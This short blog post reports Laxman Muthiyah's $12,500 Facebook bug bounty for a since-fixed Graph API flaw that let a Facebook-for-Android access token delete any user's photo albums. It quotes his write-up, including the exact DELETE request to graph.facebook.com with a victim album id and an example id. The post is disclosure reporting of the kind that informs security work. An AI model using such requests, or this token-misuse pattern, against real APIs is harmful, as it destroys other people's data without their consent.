Indian(Tamil Nadu) Hacker Laxman Muthiyah, Who discovered a bug which delete any photo on Facebook and He get a rewarded of $12500 from facebook. That bug targeted Facebook's Graph API, Which Laxman used to delete photo from facebook with a command.
I decided to try it with Facebook for mobile access token because we can see delete option for all photo albums in Facebook mobile application isn't it? Yeah and also it uses the same Graph API. so took a album id & Facebook for android access token of mine and tried it.
Request :-
DELETE /<Victim's_photo_album_id> HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>
Example:
DELETE /518171421550249 HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>
Laxman Muthiyah reported the vulnerability to Facebook and Facebook wrote back, saying that bug is fixed and offering him $12500.
No comments:
Post a Comment